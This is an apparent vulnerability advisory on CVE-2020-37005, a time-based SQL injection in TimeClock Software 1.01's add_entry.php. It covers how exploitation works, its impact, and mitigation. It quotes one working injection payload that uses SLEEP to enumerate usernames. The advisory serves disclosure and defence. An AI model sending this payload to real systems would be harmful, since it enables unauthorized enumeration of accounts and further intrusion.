CVE-2020-37005

Vulnerability

Overview TimeClock Software 1.01 contains an authenticated time-based SQL injection vulnerability in the add_entry.php endpoint. The notes parameter is not properly sanitized, allowing an attacker to inject SQL conditional statements that introduce time delays based on the truth of a condition [1]. Specifically, the attacker can use a payload like ' OR IF((SELECT username FROM user_info WHERE username='...')='...', SLEEP(5), NULL)=' to test for the existence of specific usernames [2].

Exploitation

Details Exploitation requires prior authentication as a valid user [1]. The attacker sends crafted POST requests to add_entry.php with the malicious notes parameter. By measuring the server's response time, the attacker can determine whether a specified username exists: a delay of several seconds indicates a true condition (user exists), while an immediate response indicates otherwise [2]. This technique allows systematic enumeration of all registered usernames without direct error messages.

Impact and

Mitigation Successful exploitation enables an attacker to enumerate valid usernames, which can serve as a precursor to further attacks such as brute-force password guessing or targeted social engineering. The software is no longer actively maintained; the vendor's website appears outdated with no security updates released [3]. Users are advised to implement input validation and parameterized queries, or migrate to a supported alternative, as no official patch is available [2].